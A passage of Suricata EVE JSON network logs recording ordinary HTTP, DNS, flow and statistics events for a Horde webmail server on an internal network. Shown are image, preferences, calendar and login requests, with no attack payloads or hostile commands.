Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":535}} 
{"timestamp":"2020-02-29T00:19:52.000478+0000","event_type":"stats","stats":{"uptime":14844,"capture":{"kernel_packets":137111,"kernel_drops":0},"decoder":{"pkts":137114,"bytes":94109551,"invalid":192,"ipv4":135575,"ipv6":10,"ethernet":137114,"raw":0,"null":0,"sll":0,"tcp":130102,"udp":5266,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2829,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2845,"synack":2836,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1866,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2410,"failed_udp":112},"tx":{"http":4776,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2492}},"flow_mgr":{"closed_pruned":2801,"new_pruned":17,"est_pruned":2464,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":4,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65529,"rows_empty":3,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20176,"memcap_state":0,"memcap_global":0},"http":{"memuse":322476,"memcap":0}}} 
{"timestamp":"2020-02-29T00:19:52.944295+0000","flow_id":217650389304327,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52914,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/graphics\/whitelist.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/ingo\/themes\/default\/block\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":546},"app_proto":"http","fileinfo":{"filename":"\/ingo\/themes\/default\/graphics\/whitelist.png","state":"CLOSED","stored":false,"size":546,"tx_id":3}} {"timestamp":"2020-02-29T00:19:52.944595+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52912,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":436},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-new.png","state":"CLOSED","stored":false,"size":436,"tx_id":6}} {"timestamp":"2020-02-29T00:19:52.944695+0000","flow_id":1479997112177472,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52920,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/graphics\/blacklist.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/ingo\/themes\/default\/block\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":558},"app_proto":"http","fileinfo":{"filename":"\/ingo\/themes\/default\/graphics\/blacklist.png","state":"CLOSED","stored":false,"size":558,"tx_id":2}} {"timestamp":"2020-02-29T00:19:52.946829+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52910,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-arrow-normal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":221},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-arrow-normal.png","state":"CLOSED","stored":false,"size":221,"tx_id":6}} {"timestamp":"2020-02-29T00:19:53.000739+0000","flow_id":1936470511985381,"event_type":"flow","src_ip":"192.168.10.122","src_port":49156,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:14:52.729829+0000","end":"2020-02-29T00:14:52.835054+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:53.120559+0000","flow_id":231209601455855,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33684,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17640,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:19:53.134925+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52916,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/close.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":489},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/close.png","state":"CLOSED","stored":false,"size":489,"tx_id":4}} {"timestamp":"2020-02-29T00:19:53.229605+0000","flow_id":231209601455855,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33684,"proto":"UDP","dns":{"type":"answer","id":17640,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:53.229605+0000","flow_id":231209601455855,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33684,"proto":"UDP","dns":{"type":"answer","id":17640,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:53.407533+0000","flow_id":202995961277195,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34890,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/search.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7069}} 
{"timestamp":"2020-02-29T00:19:54.289397+0000","flow_id":2148994103536245,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50516,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":20245,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:54.318794+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/settings-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":535},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/settings-active.png","state":"CLOSED","stored":false,"size":535,"tx_id":6}} {"timestamp":"2020-02-29T00:19:54.400745+0000","flow_id":2148994103536245,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50516,"proto":"UDP","dns":{"type":"answer","id":20245,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:54.400745+0000","flow_id":2148994103536245,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50516,"proto":"UDP","dns":{"type":"answer","id":20245,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:54.486048+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; 
Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3420}} {"timestamp":"2020-02-29T00:19:54.546998+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3420},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18034,"tx_id":7}} {"timestamp":"2020-02-29T00:19:54.551367+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/js\/prefs.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":237}} {"timestamp":"2020-02-29T00:19:54.554322+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/prefs.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":237},"app_proto":"http","fileinfo":{"filename":"\/js\/prefs.js","state":"CLOSED","stored":false,"size":318,"tx_id":8}} {"timestamp":"2020-02-29T00:19:54.597358+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":106}} {"timestamp":"2020-02-29T00:19:55.763423+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34886,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":1396,"tx_id":3}} {"timestamp":"2020-02-29T00:19:55.770899+0000","flow_id":787291901945212,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34888,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":0}} {"timestamp":"2020-02-29T00:19:56.000619+0000","flow_id":1633039675901026,"event_type":"flow","src_ip":"192.168.10.130","src_port":34874,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":13,"bytes_toserver":3051,"bytes_toclient":7364,"start":"2020-02-29T00:18:17.541794+0000","end":"2020-02-29T00:18:55.933107+0000","age":38,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:19:56.475426+0000","flow_id":202995961277195,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34890,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/search.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7069},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":38217,"tx_id":0}} {"timestamp":"2020-02-29T00:19:56.485020+0000","flow_id":1727159595722396,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51027,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64999,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:19:56.595891+0000","flow_id":1727159595722396,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51027,"proto":"UDP","dns":{"type":"answer","id":64999,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:56.595891+0000","flow_id":1727159595722396,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51027,"proto":"UDP","dns":{"type":"answer","id":64999,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:56.642413+0000","flow_id":202995961277195,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34890,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/login.php?horde_logout_token=kNRoyzspsLUkqfA8aZJfxcp&logout_reason=4","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3343}} {"timestamp":"2020-02-29T00:19:57.000487+0000","flow_id":2049226304089160,"event_type":"flow","src_ip":"192.168.10.130","src_port":34876,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1095,"bytes_toclient":6515,"start":"2020-02-29T00:18:51.093256+0000","end":"2020-02-29T00:18:56.301439+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:19:57.000707+0000","flow_id":1364947804081477,"event_type":"flow","src_ip":"192.168.10.122","src_port":35285,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:14:55.970053+0000","end":"2020-02-29T00:14:56.074979+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:57.419022+0000","flow_id":943259344790734,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54456,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":59908,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:57.527637+0000","flow_id":943259344790734,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54456,"proto":"UDP","dns":{"type":"answer","id":59908,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:57.527637+0000","flow_id":943259344790734,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54456,"proto":"UDP","dns":{"type":"answer","id":59908,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:57.576511+0000","flow_id":784388504545285,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34892,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":89}} 
{"timestamp":"2020-02-29T00:19:57.576511+0000","flow_id":784388504545285,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34892,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":89},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":29,"tx_id":0}} {"timestamp":"2020-02-29T00:19:58.719665+0000","flow_id":599515932326705,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46256,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":47452,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:58.754771+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":106},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button.png","state":"CLOSED","stored":false,"size":106,"tx_id":9}} 
{"timestamp":"2020-02-29T00:19:58.830845+0000","flow_id":599515932326705,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46256,"proto":"UDP","dns":{"type":"answer","id":47452,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:58.830845+0000","flow_id":599515932326705,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46256,"proto":"UDP","dns":{"type":"answer","id":47452,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:58.896827+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde&group=identities","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4359}} {"timestamp":"2020-02-29T00:19:58.927557+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde&group=identities","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4359},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":20138,"tx_id":10}} 
{"timestamp":"2020-02-29T00:19:58.969268+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/js\/identityselect.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":461}} {"timestamp":"2020-02-29T00:19:58.971477+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/identityselect.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":461},"app_proto":"http","fileinfo":{"filename":"\/js\/identityselect.js","state":"CLOSED","stored":false,"size":983,"tx_id":11}} {"timestamp":"2020-02-29T00:19:58.971771+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":117}} 
{"timestamp":"2020-02-29T00:19:59.000281+0000","event_type":"stats","stats":{"uptime":14851,"capture":{"kernel_packets":137189,"kernel_drops":0},"decoder":{"pkts":137198,"bytes":94135989,"invalid":192,"ipv4":135655,"ipv6":10,"ethernet":137198,"raw":0,"null":0,"sll":0,"tcp":130176,"udp":5272,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2830,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2846,"synack":2837,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1867,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2413,"failed_udp":112},"tx":{"http":4783,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2495}},"flow_mgr":{"closed_pruned":2803,"new_pruned":17,"est_pruned":2466,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":1,"flows_timeout":2,"flows_timeout_inuse":0,"flows_removed":2,"rows_checked":65536,"rows_skipped":65532,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21167,"memcap_state":0,"memcap_global":0},"http":{"memuse":110192,"memcap":0}}} 
{"timestamp":"2020-02-29T00:20:01.647446+0000","flow_id":202995961277195,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34890,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/login.php?horde_logout_token=kNRoyzspsLUkqfA8aZJfxcp&logout_reason=4","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3343},"app_proto":"http","fileinfo":{"filename":"\/login.php","state":"CLOSED","stored":false,"size":8574,"tx_id":1}} {"timestamp":"2020-02-29T00:20:02.578245+0000","flow_id":784388504545285,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34892,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 